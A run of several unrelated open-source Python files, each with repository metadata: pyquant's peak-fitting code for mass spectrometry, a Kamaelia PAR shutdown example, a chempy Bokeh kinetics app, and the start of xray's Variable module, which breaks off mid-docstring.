find_nearest(non_empty, start_mz) isotope_index = 0 use_theo = False # This is purposefully verbose to be more explicit if reporter_mode is False and fragment_scan is False: while get_ppm(start_mz, first_mz) > tolerance: # let's try using our theoretical mass first_mz = find_nearest(non_empty, theo_mz) if get_ppm(theo_mz, first_mz) > tolerance: # let's check our last boundary. This allows for drift in m/z values # as scans progress instead of enforcing the m/z at the first # observed instance of a given m/z if last_precursor is not None: first_mz = find_nearest(non_empty, last_precursor) if get_ppm(last_precursor, first_mz) > tolerance: # repeat all of that for the next isotopic index start_mz += spacing initial_mz += spacing theo_mz += spacing last_precursor += spacing isotope_index += 1 else: start_mz = last_precursor break else: start_mz += spacing theo_mz += spacing initial_mz += spacing isotope_index += 1 else: use_theo = True break tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 if isotope_index == 2 or (max_mz is not None and first_mz >= max_mz): if debug: print("unable to find start ion") return empty_dict precursor_tolerance = tolerance isotope_index += isotope_offset start_index = find_nearest_index(xdata, first_mz) start_info = findMicro( xdata, ydata, start_index, ppm=tolerance, start_mz=start_mz, calc_start_mz=theo_mz, quant_method=quant_method, reporter_mode=reporter_mode, fragment_scan=fragment_scan, centroid=centroid, ) start_error = start_info["error"] if "params" in start_info: if fragment_scan is False and start_info["error"] > tolerance: start = ( last_precursor if last_precursor is not None else theo_mz if use_theo else start_mz ) else: start = start_info["params"][1] else: if debug: print("empty start info", start_info) return empty_dict valid_locations2 = OrderedDict() valid_locations2[isotope_index] = [(0, start, find_nearest_index(non_empty, start))] contaminant_int = 0.0 if not reporter_mode and ( isotopologue_limit == -1 or len(valid_locations2) < isotopologue_limit ): isotope_index += 1 pos = find_nearest_index(non_empty, start) + 1 offset = isotope_index * spacing df_len = non_empty.shape[0] last_displacement = None valid_locations = [] # check for contaminant at doubly and triply charged positions to see if we're in another ion's peak if contaminant_search: for i in range(2, 4): closest_contaminant = find_nearest( non_empty, start - CARBON_NEUTRON / float(i) ) closest_contaminant_index = find_nearest_index( xdata, closest_contaminant ) contaminant_bounds = findMicro( xdata, ydata, closest_contaminant_index, ppm=precursor_tolerance, calc_start_mz=start, start_mz=start, isotope=-1, spacing=CARBON_NEUTRON / float(i), quant_method=quant_method, centroid=centroid, ) if contaminant_bounds.get("int", 0) > contaminant_int: contaminant_int = contaminant_bounds.get("int", 0.0) # set the tolerance for isotopes tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 while pos < df_len: # search for the ppm error until it rises again, we select the minima and if this minima is # outside our ppm error, we stop the expansion of our isotopic cluster current_loc = non_empty[pos] if max_mz is not None and current_loc >= max_mz: if not valid_locations: break displacement = ( last_displacement + tolerance if last_displacement is not None else tolerance * 2 ) else: displacement = get_ppm(start + offset, current_loc) # because the peak location may be between two readings, we use a very tolerance search here and enforce the ppm at the peak fitting stage. if displacement < tolerance * 5: valid_locations.append((displacement, current_loc, pos)) if last_displacement is not None: if valid_locations and displacement > last_displacement: # pick the peak closest to our error tolerance valid_locations2[isotope_index] = valid_locations isotope_index += 1 tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 offset = spacing * isotope_index displacement = get_ppm(start + offset, current_loc) valid_locations = [] if isotopologue_limit != -1 and ( len(valid_locations2) >= isotopologue_limit ): break elif displacement > last_displacement and not valid_locations: break last_displacement = displacement pos += 1 # combine any overlapping micro envelopes valid_keys = sorted( set(valid_locations2.keys()).intersection( theo_dist.keys() if theo_dist is not None else valid_locations2.keys() ) ) best_locations = [ sorted(valid_locations2[i], key=itemgetter(0))[0] for i in valid_keys ] for index, isotope_index in enumerate(valid_keys): if skip_isotopes is not None and isotope_index in skip_isotopes: continue _, _, empty_index = best_locations[index] micro_index = find_nearest_index(xdata, non_empty[empty_index]) if ydata[micro_index] == 0: micro_index += 1 if ydata[micro_index] == 0: micro_index -= 2 # if micro_index == 0: # pass isotope_tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 micro_bounds = findMicro( xdata, ydata, micro_index, ppm=precursor_tolerance if isotope_index == 0 else isotope_tolerance, calc_start_mz=start, start_mz=start_mz, isotope=isotope_index, spacing=spacing, quant_method=quant_method, centroid=centroid, ) if isotope_index == 0: micro_bounds["error"] = start_error micro_dict[isotope_index] = micro_bounds env_dict[isotope_index] = micro_index ppm_dict[isotope_index] = micro_bounds.get("error") # in all cases, the envelope is going to be either monotonically decreasing, or a parabola (-x^2) isotope_pattern = [ (isotope_index, isotope_dict["int"]) for isotope_index, isotope_dict in micro_dict.items() ] # Empirically, it's been found that enforcing the theoretical distribution on a per ms1 scan basis leads to # significant increases in variance for the XIC, so don't do it here if contaminant_int > 1: for i, (isotope_index, isotope_intensity) in enumerate(isotope_pattern): if contaminant_int > isotope_intensity: if debug: print("contaminant loss", label) env_dict.pop(isotope_index) micro_dict.pop(isotope_index) ppm_dict.pop(isotope_index) # rebuild the pattern after contaminants are removed isotope_pattern = [ (isotope_index, isotope_dict["int"]) for isotope_index, isotope_dict in micro_dict.items() ] if theo_dist is None: # are we monotonically decreasing? remove = False if len(isotope_pattern) > 2: # check if the 2nd isotope is smaller than the first. This is a classical case looking like: # # | # | | # | | | # | | | | if isotope_pattern[1][1] < isotope_pattern[0][1]: # we are, check this trend holds and remove isotopes it fails for for i, j in zip(isotope_pattern, isotope_pattern[1:]): if j[1] * 0.9 > i[1]: # the pattern broke, remove isotopes beyond this point remove = True if remove: if debug: print("pattern2.1 loss", label, j[0], isotope_pattern) env_dict.pop(j[0]) micro_dict.pop(j[0]) ppm_dict.pop(j[0]) # check if the 2nd isotope is larger than the first. This is a case looking like: # # # | | # | | # | | | | elif isotope_pattern[1][1] > isotope_pattern[0][1]: shift = False for i, j in zip(isotope_pattern, isotope_pattern[1:]): if shift and j[1] * 0.9 > i[1]: remove = True elif shift is False and j[1] < i[1] * 0.9: if shift: remove = True else: shift = True if remove: if debug: print("pattern2.2 loss", label, j[0], isotope_pattern) env_dict.pop(j[0]) micro_dict.pop(j[0]) ppm_dict.pop(j[0]) return { "envelope": env_dict, "micro_envelopes": micro_dict, "ppms": ppm_dict, } def findAllPeaks( xdata, ydata_original, min_dist=0, method=None, local_filter_size=0, filter=False, peak_boost=False, bigauss_fit=False, rt_peak=None, mrm=False, max_peaks=4, debug=False, peak_width_start=3, snr=0, zscore=0, amplitude_filter=0, peak_width_end=4, fit_baseline=False, rescale=True, fit_negative=False, percentile_filter=0, micro=False, method_opts=None, smooth=False, r2_cutoff=None, peak_find_method=PEAK_FINDING_REL_MAX, min_slope=None, min_peak_side_width=3, gap_interpolation=0, min_peak_width=None, min_peak_increase=None, chunk_factor=0.1, fit_mode=PEAK_FIT_MODE_AVERAGE, baseline_subtraction=False, **kwargs ): # Deprecation things if "baseline_correction" in kwargs: fit_baseline = kwargs["baseline_correction"] if micro: fit_baseline = False if not micro and gap_interpolation: ydata_original = interpolate_data( xdata, ydata_original, gap_limit=gap_interpolation ) rel_peak_constraint = 0.0 if fit_baseline else 0.5 original_max = ( np.abs(ydata_original).max() if fit_negative else ydata_original.max() ) amplitude_filter /= original_max ydata = ydata_original / original_max ydata_peaks = np.copy(ydata) if baseline_subtraction: ydata_peaks = subtract_baseline(ydata_peaks) if smooth and len(ydata) > 5: ydata_peaks = savgol_smooth(ydata_peaks) if filter or peak_boost: if len(ydata) >= 5: ydata_peaks = convolve(ydata_peaks, kaiser(10, 12), mode="same") ydata_peaks[np.isnan(ydata_peaks)] = 0 ydata_peaks /= np.abs(ydata_peaks).max() if fit_negative else ydata_peaks.max() final_peaks = find_possible_peaks( xdata, ydata, ydata_peaks, peak_find_method=peak_find_method, peak_width_start=peak_width_start, peak_width_end=peak_width_end, snr=snr, zscore=zscore, rt_peak=rt_peak, amplitude_filter=amplitude_filter, fit_negative=fit_negative, percentile_filter=percentile_filter, local_filter_size=local_filter_size, micro=micro, min_slope=min_slope, min_dist=min_dist, min_peak_side_width=min_peak_side_width, min_peak_width=min_peak_width, smooth=smooth, min_peak_increase=min_peak_increase, ) # Next, for fitting multiple peaks, we want to divide up the space so we are not fitting peaks that # have no chance of actually impacting one another. CHUNK_MAP = { PEAK_FIT_MODE_SLOW: 0.1, PEAK_FIT_MODE_AVERAGE: 0.5, PEAK_FIT_MODE_FAST: 1.0, } chunks = divide_peaks( np.abs(ydata_peaks), min_sep=5 if 5 > peak_width_end else peak_width_end, chunk_factor=CHUNK_MAP[fit_mode], ) if not chunks.any() or chunks[-1] != len(ydata_peaks): chunks = np.hstack((chunks, len(ydata_peaks))) logger.debug("found: {}\n".format(final_peaks)) step_size = 4 if bigauss_fit else 3 if fit_baseline: step_size += 2 min_spacing = min(np.diff(xdata)) / 2 peak_range = xdata[-1] - xdata[0] # initial bound setup initial_bounds = [(-1.01, 1.01), (xdata[0], xdata[-1]), (min_spacing, peak_range)] if bigauss_fit: initial_bounds.extend([(min_spacing, peak_range)]) if fit_baseline: initial_bounds.extend([(None, None), (None, None)]) # print(final_peaks) if debug: sys.stderr.write("final peaks: {}\n".format(final_peaks)) fitted_segments = defaultdict(list) for peak_width, peak_info in final_peaks.items(): row_peaks = peak_info["peaks"] if not row_peaks.any(): continue minima_array = np.array(peak_info["minima"], dtype=np.long) # Now that we have estimated the parameters for fitting all the data, we divide it up into # chunks and fit each segment. The choice to fit all parameters first is to prevent cases # where a chunk is dividing two overlapping points and the variance estimate may be too low. for chunk_index, right_break_point in enumerate(chunks): left_break_point = chunks[chunk_index - 1] if chunk_index != 0 else 0 segment_x = xdata[left_break_point:right_break_point] segment_y = deepcopy(ydata[left_break_point:right_break_point]) if not segment_y.any(): continue if not micro: segment_max = np.abs(segment_y).max() segment_y /= segment_max segment_row_peaks = [] segment_minima_array = [] for i in row_peaks: if i >= left_break_point: if i < right_break_point: segment_row_peaks.append(i - left_break_point) else: break for i in minima_array: if i >= left_break_point: if i < right_break_point: segment_minima_array.append(i - left_break_point) else: break if not segment_row_peaks: continue # Get peak parameter estimates and boundaries for this segment segment_guess, segment_bounds = estimate_peak_parameters( segment_x, segment_y, np.array(segment_row_peaks), np.array(segment_minima_array), fit_negative=fit_negative, rel_peak_constraint=rel_peak_constraint, micro=micro, bigauss_fit=bigauss_fit, fit_baseline=fit_baseline, ) if not segment_guess: continue args = (segment_x, segment_y, fit_baseline) opts = method_opts or {"maxiter": 1000} # Because the amplitude of peaks can vary wildly, we have to make sure our tolerance matters for the # smallest peaks. i.e. if we are fitting two peaks, one with an amplitude of 20M and another with 10000, # changes in the smaller peak will be below our tolerance and the minimization routine can ignore them if "ftol" not in opts and not micro: min_tol = 1e-10 for i, j in zip(segment_bounds, segment_guess): abs_i = np.abs(i[0]) if i[0] else None abs_j = np.abs(j) if j else None if abs_i and abs_i < min_tol: min_tol = abs_i / 5.0 if abs_j and abs_j < min_tol: min_tol = abs_j / 5.0 opts["ftol"] = min_tol fit_func = bigauss_func if bigauss_fit else gauss_func routines = ["SLSQP", "TNC", "L-BFGS-B"] if method: routines = [method] routine = routines.pop(0) if len(segment_bounds) == 0: segment_bounds = deepcopy(initial_bounds) # Check that the bounds for the mean are within the segment so the optimizer doesn't try and cheat # by going to solutions outside of the data if not micro: for i in range(1, len(segment_bounds), step_size): if segment_bounds[i][0] < segment_x[0]: segment_bounds[i] = (segment_x[0], segment_bounds[i][1]) if segment_bounds[i][1] > segment_x[-1]: segment_bounds[i] = (segment_bounds[i][0], segment_x[-1]) if fit_baseline: jacobian = None else: jacobian = bigauss_jac if bigauss_fit else gauss_jac if debug: print( "left and right segments", xdata[left_break_point], xdata[right_break_point - 1], ) print("guess and bnds", segment_guess, segment_bounds) hessian = None # if bigauss_fit else gauss_hess results = [ optimize.minimize( fit_func, segment_guess, args, method=routine, bounds=segment_bounds, options=opts, jac=jacobian, hess=hessian, tol=1e-3, ) ] while not results[-1].success and routines: routine = routines.pop(0) results.append( optimize.minimize( fit_func, segment_guess, args, method=routine, bounds=segment_bounds, options=opts, jac=jacobian, ) ) if results[-1].success: res = results[-1] else: res = sorted(results, key=attrgetter("fun"))[0] n = len(segment_x) k = len(res.x) bic = n * np.log(res.fun / n) + k * np.log(n) res.bic = bic for index, value in enumerate(res.x[2::step_size]): if value < min_spacing: res.x[2 + index * step_size] = min_spacing if bigauss_fit: for index, value in enumerate(res.x[3::step_size]): if value < min_spacing: res.x[3 + index * step_size] = min_spacing # does this data contain our rt peak? res._contains_rt = False if rt_peak != 0: for i in range(1, res.x.size, step_size): mean = res.x[i] lstd = res.x[i + 1] if bigauss_fit: rstd = res.x[i + 2] else: rstd = lstd if ( rt_peak is not None and mean - lstd * 2 < rt_peak < mean + rstd * 2 ): res._contains_rt = True if not micro: # Rescale our data back # Amplitude res.x[::step_size] *= segment_max if fit_baseline: # Slope res.x[step_size - 2 :: step_size] *= segment_max # Intercept res.x[step_size - 1 :: step_size] *= segment_max # TODO: Evaluate the F-test based method # if best_res: # cmodel_ssq = best_res.fun # new_model_ssq = res.fun # df = len(xdata)-len(res.x) # f_ratio = (cmodel_ssq-new_model_ssq)/(new_model_ssq/df) # res.p = 1-stats.f.cdf(f_ratio, 1, df) # bic = res.p # # if not best_res or res.p < best_res.p: # best_res = res # best_fit = np.copy(res.x) # best_rss = res.fun fitted_segments[(peak_width, chunk_index)].append((bic, res)) # Figure out the best set of fits segment_order = sorted(fitted_segments.keys(), key=itemgetter(0, 1)) best_fits = { peak_width: {"fit": [], "residual": 0,} for (peak_width, chunk_index) in segment_order } for key in segment_order: peak_width = key[0] fits = fitted_segments[key] lowest_bic = np.inf best_segment_res = 0 best_segment_fit = None for bic, res in fits: if bic < lowest_bic or ( getattr(best_segment_res, "_contains_rt", False) is not True and res._contains_rt is True ): if debug: sys.stderr.write("{} < {}\n".format(bic, lowest_bic)) if ( res._contains_rt is False and best_segment_res != 0 and best_segment_res._contains_rt is True ): continue if debug: print("NEW BEST!", res, "old was", best_segment_res) best_segment_fit = np.copy(res.x) best_segment_res = res lowest_bic = bic if debug: sys.stderr.write("{} - best: {}\n".format(res, best_segment_fit)) else: if best_segment_fit is None: return np.array([]), np.inf best_fits[peak_width]["fit"] += best_segment_fit.tolist() best_fits[peak_width]["residual"] += lowest_bic best_fits[peak_width][ "contains_rt" ] = not best_segment_res._contains_rt # this is so it sorts lower best_fit = sorted( ( ( best_fits[key[0]]["contains_rt"], best_fits[key[0]]["residual"], best_fits[key[0]]["fit"], ) for key in segment_order ), key=itemgetter(0, 1), ) if not best_fit: return (np.array([]), np.inf) best_fit = np.array(best_fit[0][2]) # If the user only wants a certain number of peaks, enforce that now if max_peaks != -1: # pick the top n peaks for max_peaks if rt_peak: means = best_fit[1::step_size] # If the user specified a retention time as a guide, select the n peaks closest peak_indices = np.argsort(np.abs(means - rt_peak))[:max_peaks] else: # Return the top n highest peaks amplitudes = best_fit[0::step_size] peak_indices = sorted(np.argsort(amplitudes)[::-1][:max_peaks]) best_fit = np.hstack( [best_fit[i * step_size : (i + 1) * step_size] for i in peak_indices] ) peak_func = bigauss_ndim if bigauss_fit else gauss_ndim # Get rid of peaks with low r^2 if not micro and r2_cutoff is not None: final_fit = np.array([]) for peak_index in range(0, len(best_fit), step_size): peak_info = best_fit[peak_index : peak_index + step_size] amplitude, mean, std = peak_info[:3] left = mean - 2 * std right = mean + 2 * peak_info[3] if bigauss_fit else mean + 2 * std # Establish a goodness of fit using the coefficient of determination (the r^2) value for each peak. # Because the input data can have multiple peaks, we calculate a r^2 that considers the variance around this peak. curve_indices = (xdata >= left) & (xdata <= right) fitted_data = ydata[curve_indices] fitted_x = xdata[curve_indices] for other_peak_index in range(0, len(best_fit), step_size): if other_peak_index == peak_index: continue fitted_data -= peak_func( fitted_x, best_fit[other_peak_index : other_peak_index + step_size] ) ss_tot = np.sum((fitted_data - np.mean(fitted_data)) ** 2) explained_data = peak_func(fitted_x, peak_info) if fit_baseline: explained_data += fitted_x * peak_info[-2] + peak_info[-1] ss_res = np.sum((fitted_data - explained_data) ** 2) coeff_det = 1 - (ss_res / ss_tot) if coeff_det >= r2_cutoff: final_fit = np.hstack((final_fit, peak_info)) best_fit = final_fit residual = sum((ydata - peak_func(xdata, best_fit)) ** 2) if rescale: # and not fit_baseline: best_fit[::step_size] *= original_max if fit_baseline: # Slope best_fit[step_size - 2 :: step_size] *= original_max # Intercept best_fit[step_size - 1 :: step_size] *= original_max return best_fit, residual def findMicro( xdata, ydata, pos, ppm=None, start_mz=None, calc_start_mz=None, isotope=0, spacing=0, quant_method="integrate", fragment_scan=False, centroid=False, reporter_mode=False, ): """ We want to find the boundaries of our isotopic clusters. Basically we search until our gradient changes, this assumes it's roughly gaussian and there is little interference """ # find the edges within our tolerance tolerance = ppm offset = spacing * isotope df_empty_index = xdata[ydata == 0] if start_mz is None: start_mz = xdata[pos] fit = True if centroid: int_val = ydata[pos] left, right = pos - 1, pos + 1 error = get_ppm(start_mz + offset, xdata[pos]) fit = np.abs(error) < tolerance peak = [int_val, xdata[pos], 0] else: if df_empty_index.size == 0 or not ( df_empty_index[0] < xdata[pos] < df_empty_index[-1] ): left = 0 right = xdata.size else: right = np.searchsorted(df_empty_index, xdata[pos]) left = right - 1 left, right = ( np.searchsorted(xdata, df_empty_index[left], side="left"), np.searchsorted(xdata, df_empty_index[right]), ) right += 1 new_x = xdata[left:right] new_y = ydata[left:right] if new_y.sum() == new_y.max(): peak_mean = new_x[np.where(new_y > 0)][0] peaks = (new_y.max(), peak_mean, 0) sorted_peaks = [(peaks, get_ppm(start_mz + offset, peak_mean))] else: peaks, peak_residuals = findAllPeaks( new_x, new_y, min_dist=(new_x[1] - new_x[0]) * 2.0, peak_width_start=1, micro=True, ) sorted_peaks = sorted( [ (peaks[i * 3 : (i + 1) * 3], get_ppm(start_mz + offset, v)) for i, v in enumerate(peaks[1::3]) ], key=itemgetter(1), ) if (fragment_scan is False or reporter_mode) and not within_tolerance( sorted_peaks, tolerance ): if calc_start_mz is not None: sorted_peaks2 = sorted( [ (peaks[i * 3 : (i + 1) * 3], get_ppm(calc_start_mz + offset, v)) for i, v in enumerate(peaks[1::3]) ], key=itemgetter(1), ) if any(filter(lambda x: x[1] < tolerance, sorted_peaks2)): sorted_peaks = sorted_peaks2 else: fit = False else: fit = False peak = np.array(sorted_peaks[0][0]) # only go ahead with fitting if we have a stdev. Otherwise, set this to 0 if peak[2] > 0: # peak[0] *= new_y.max() int_val = gauss_ndim(new_x, peak).sum() else: int_val = 0.0 if not fit: pass error = sorted_peaks[0][1] ret_dict = { "int": int_val if fit or (fragment_scan is True and not reporter_mode) else 0.0, "int2": int_val, "bounds": (left, right), "params": peak, "error": error, } return ret_dict def within_tolerance(arr, tolerance): # arr is a list of tuples with the [1] index for each tuple being the ppm error for i in arr: if i[1] < tolerance: return 1 return 0 def targeted_search( merged_x, merged_y, x_value, attempts=4, max_peak_distance=1.0, peak_finding_kwargs=None, ): rt_attempts = 0 fitting_y = np.copy(merged_y) find_peaks_kwargs = { "filter": False, "bigauss_fit": True, "rt_peak": x_value, } peak_finding_kwargs = peak_finding_kwargs or {} if peak_finding_kwargs: assert isinstance( peak_finding_kwargs, dict ), "peak_finding_kwargs must be a dictionary" find_peaks_kwargs.update(peak_finding_kwargs) debug = peak_finding_kwargs.get("debug") found_rt = False stepsize = 3 if find_peaks_kwargs.get("bigauss_fit"): stepsize += 1 if find_peaks_kwargs.get("fit_baseline"): stepsize += 2 while rt_attempts < attempts and not found_rt: logger.debug("MERGED PEAK FINDING ATTEMPT %s", rt_attempts) res, residual = findAllPeaks(merged_x, fitting_y, **find_peaks_kwargs) if not res.any(): return (None, np.inf) rt_peak = bigauss_ndim(np.array([x_value]), res)[0] # we don't do this routine for cases where there are > 5 found_rt = sum(fitting_y > 0) <= 5 or rt_peak > 0.05 if not found_rt and rt_peak < 0.05: # get the closest peak nearest_peak = sorted( [(i, np.abs(x_value - i)) for i in res[1::stepsize]], key=itemgetter(1) )[0][0] # this is tailored to mass spectrometry elution profiles at the moment, and only evaluates for situtations where the rt and peak # are no further than a minute apart. if np.abs(nearest_peak - x_value) < max_peak_distance: rt_index = find_nearest_index(merged_x, x_value) peak_index = find_nearest_index(merged_x, nearest_peak) if rt_index < 0: rt_index = 0 if peak_index == -1: peak_index = len(fitting_y) if rt_index != peak_index: grad_len = np.abs(peak_index - rt_index) if grad_len < 4: found_rt = True else: gradient = ( (np.gradient(fitting_y[rt_index:peak_index]) > 0) if rt_index < peak_index else (np.gradient(fitting_y[peak_index:rt_index]) < 0) ) if sum(gradient) >= grad_len - 1: found_rt = True else: found_rt = True if not found_rt: if debug: print("cannot find rt for", x_value) print(merged_x, fitting_y, res, sum(fitting_y > 0)) fitting_y -= bigauss_ndim(merged_x, res) fitting_y[fitting_y < 0] = 0 rt_attempts += 1 return (res, residual) if found_rt else (None, np.inf)
Chris7/pyquant
pyquant/peaks.py
Python
mit
35,651
[ "Gaussian" ]
daedcae349be75eed27398153aeb989e6f333c45094916fffa1ba568f000a08d
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1) # # (1) Kamaelia Contributors are listed in the AUTHORS file and at # http://www.kamaelia.org/AUTHORS - please extend this file, # not this notice. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------- # import os import time import Axon from Kamaelia.Chassis.Pipeline import Pipeline from Kamaelia.Chassis.PAR import PAR from Kamaelia.Codec.Dirac import DiracDecoder from Kamaelia.File.ReadFileAdaptor import ReadFileAdaptor from Kamaelia.UI.Pygame.Button import Button from Kamaelia.UI.Pygame.Image import Image from Kamaelia.UI.Pygame.Ticker import Ticker from Kamaelia.UI.Pygame.Text import TextDisplayer, Textbox from Kamaelia.UI.Pygame.VideoOverlay import VideoOverlay from Kamaelia.UI.Pygame.VideoSurface import VideoSurface from Kamaelia.Util.Chooser import Chooser from Kamaelia.Util.RateFilter import MessageRateLimit from Kamaelia.Video.PixFormatConversion import ToRGB_interleaved class timedShutdown(Axon.ThreadedComponent.threadedcomponent): TTL = 1 def main(self): time.sleep(self.TTL) self.send(Axon.Ipc.shutdownMicroprocess(), "signal") path = "Slides" extn = ".gif" allfiles = os.listdir(path) files = list() for fname in allfiles: if fname[-len(extn):]==extn: files.append(os.path.join(path,fname)) files.sort() file = "/data/dirac-video/snowboard-jum-352x288x75.dirac.drc" framerate = 3 Pipeline( timedShutdown(TTL=15), PAR( Pipeline( ReadFileAdaptor(file, readmode="bitrate", bitrate = 300000*8/5), DiracDecoder(), MessageRateLimit(framerate), VideoOverlay(position=(260,48), size=(200,300)), ), Pipeline( ReadFileAdaptor(file, readmode="bitrate", bitrate = 2280960*8), DiracDecoder(), # MessageRateLimit(framerate), ToRGB_interleaved(), VideoSurface(size=(200, 300), position=(600,48)), ), Pipeline( PAR( Button(caption="Next", msg="NEXT", position=(72,8)), Button(caption="Previous", msg="PREV", position=(8,8)), Button(caption="First", msg="FIRST" ,position=(256,8)), Button(caption="Last", msg="LAST", position=(320,8)), ), Chooser(items = files), Image(size=(200,300), position=(8,48), maxpect=(200,300)), ), Pipeline( Textbox(size=(200,300), position=(8,360)), TextDisplayer(size=(200,300), position=(228,360)), ), Ticker(size=(200,300), position=(450,360)), ), ).run()
sparkslabs/kamaelia
Sketches/MPS/BugReports/FixTests/Kamaelia/Examples/UsingChassis/PAR/par_shutdown.py
Python
apache-2.0
3,471
[ "DIRAC" ]
1fbdc471886b027606f7cdbf79ef6371c9a7119ac8cbf72cf2ce404df2ff87d1
""" Interactive kinetics app with sliders (with units). Start by runing: $ bokeh serve interactive.py Add --show argument or navigate to: http://localhost:5006/interactive """ from collections import defaultdict import sys from chempy.util.bkh import integration_with_sliders from chempy.units import SI_base_registry, default_units as u from bokeh_interactive_arrhenius import get_rsys if __name__.startswith("bk_"): from bokeh.io import curdoc Af, Ab, Ea, Er = ( 1e16 / u.molar / u.s, 1.5e15 / u.s, 72e3 * u.J / u.mol, -12e3 * u.J / u.mol, ) curdoc().add_root( integration_with_sliders( get_rsys(Af, Ab, Ea, Er), tend=3 * u.s, c0=defaultdict( lambda: 0 * u.molar, {"Fe+3": 3e-3 * u.molar, "SCN-": 1.5e-3 * u.molar} ), parameters={"temperature": 298.15 * u.K}, slider_kwargs={ "temperature": dict( start=273.15 * u.K, end=313.15 * u.K, step=0.05 * u.K ) }, get_odesys_kw=dict( unit_registry=SI_base_registry, output_conc_unit=u.molar, output_time_unit=u.second, ), ) ) elif __name__ == "__main__": import warnings warnings.warn("Run using 'bokeh serve %s'" % __file__) sys.exit(1)
bjodah/aqchem
examples/bokeh_interactive_arrhenius_units.py
Python
bsd-2-clause
1,400
[ "ChemPy" ]
36bacc5786bd8959e989271bbb653cbcef3e6f0a070a36ae71944699a838d4c6
from datetime import timedelta import functools import itertools import numpy as np import pandas as pd from . import common from . import indexing from . import ops from . import utils from .pycompat import basestring, OrderedDict, zip, reduce, dask_array_type from .indexing import (PandasIndexAdapter, LazilyIndexedArray, orthogonally_indexable) import xray # only for Dataset and DataArray def as_variable(obj, key=None, strict=True): """Convert an object into an Variable - If the object is already an `Variable`, return it. - If the object is a `DataArray`, return it if `strict=False` or return its variable if `strict=True`. - Otherwise, if the object has 'dims' and 'data' attributes, convert it into a new `Variable`. - If all else fails, attempt to convert the object into an `Variable` by unpacking it into the arguments for `Variable.__init__`. """ # TODO: consider extending this method to automatically handle Iris and # pandas objects. if strict and hasattr(obj, 'variable'): # extract the primary Variable from DataArrays obj = obj.variable if not isinstance(obj, (Variable, xray.DataArray)): if hasattr(obj, 'dims') and (hasattr(obj, 'data') or hasattr(obj, 'values')): obj = Variable(obj.dims, getattr(obj, 'data', obj.values), getattr(obj, 'attrs', None), getattr(obj, 'encoding', None)) elif isinstance(obj, tuple): try: obj = Variable(*obj) except TypeError: raise TypeError('cannot convert argument into an Variable') elif utils.is_scalar(obj): obj = Variable([], obj) elif getattr(obj, 'name', None) is not None: obj = Variable(obj.name, obj) elif key is not None: obj = Variable(key, obj) else: raise TypeError('cannot infer Variable dimensions') return obj def _maybe_wrap_data(data): """ Put pandas.Index and numpy.ndarray arguments in adapter objects to ensure they can be indexed properly. NumpyArrayAdapter, PandasIndexAdapter and LazilyIndexedArray should all pass through unmodified. """ if isinstance(data, pd.Index): return PandasIndexAdapter(data) return data def _as_compatible_data(data, fastpath=False): """Prepare and wrap data to put in a Variable. - If data does not have the necessary attributes, convert it to ndarray. - If data has dtype=datetime64, ensure that it has ns precision. If it's a pandas.Timestamp, convert it to datetime64. - If data is already a pandas or xray object (other than an Index), just use the values. Finally, wrap it up with an adapter if necessary. """ if fastpath and getattr(data, 'ndim', 0) > 0: # can't use fastpath (yet) for scalars return _maybe_wrap_data(data) # add a custom fast-path for dask.array to avoid expensive checks for the # dtype attribute if isinstance(data, dask_array_type): return data if isinstance(data, pd.Index): if isinstance(data, pd.MultiIndex): raise NotImplementedError( 'no support yet for using a pandas.MultiIndex in an ' 'xray.Coordinate') return _maybe_wrap_data(data) if isinstance(data, pd.Timestamp): # TODO: convert, handle datetime objects, too data = np.datetime64(data.value, 'ns') if isinstance(data, timedelta): data = np.timedelta64(getattr(data, 'value', data), 'ns') if (not hasattr(data, 'dtype') or not hasattr(data, 'shape') or isinstance(data, (np.string_, np.datetime64, np.timedelta64))): # data must be ndarray-like data = np.asarray(data) # we don't want nested self-described arrays data = getattr(data, 'values', data) if isinstance(data, np.ma.MaskedArray): mask = np.ma.getmaskarray(data) if mask.any(): dtype, fill_value = common._maybe_promote(data.dtype) data = np.asarray(data, dtype=dtype) data[mask] = fill_value else: data = np.asarray(data) if isinstance(data, np.ndarray): data = common._possibly_convert_objects(data) if data.dtype.kind == 'M': # TODO: automatically cast arrays of datetime objects as well data = np.asarray(data, 'datetime64[ns]') if data.dtype.kind == 'm': data = np.asarray(data, 'timedelta64[ns]') return _maybe_wrap_data(data) def _as_array_or_item(data): """Return the given values as a numpy array, or as an individual item if it's a 0-dimensional object array or datetime64. Importantly, this function does not copy data if it is already an ndarray - otherwise, it will not be possible to update Variable values in place. """ data = np.asarray(data) if data.ndim == 0: if data.dtype.kind == 'O': # unpack 0d object arrays to be consistent with numpy data = data.item() elif data.dtype.kind == 'M': # convert to a np.datetime64 object, because 0-dimensional ndarrays # with dtype=datetime64 are broken :( data = np.datetime64(data, 'ns') elif data.dtype.kind == 'm': data = np.timedelta64(data, 'ns') return data class Variable(common.AbstractArray, utils.NdimSizeLenMixin): """A netcdf-like variable consisting of dimensions, data and attributes which describe a single Array. A single Variable object is not fully described outside the context of its parent Dataset (if you want such a fully described object, use a DataArray instead). The main functional difference between Variables and numpy arrays is that numerical operations on Variables implement array broadcasting by dimension name. For example, adding an Variable with dimensions `('time',)` to another Variable with dimensions `('space',)` results in a new Variable with dimensions `('time', 'space')`. Furthermore, numpy reduce operations like ``mean`` or ``sum`` are overwritten to take a "dimension" argument instead of an "axis". Variables are light-weight objects used as the building block for datasets. They are more primitive objects, so operations with them provide marginally higher performance than using DataArrays. However, manipulating data in the form of a Dataset or DataArray should almost always be preferred, because they can use more complete metadata in context of coordinate labels. """ def __init__(self, dims, data, attrs=None, encoding=None, fastpath=False): """ Parameters ---------- dims : str or sequence of str Name(s) of the the data dimension(s). Must be either a string (only for 1D data) or a sequence of strings with length equal to the number of dimensions. data : array_like Data array which supports numpy-like data access. attrs : dict_like or None, optional Attributes to assign to the new variable. If None (default), an empty attribute dictionary is initialized. encoding : dict_like or None, optional Dictionary specifying how 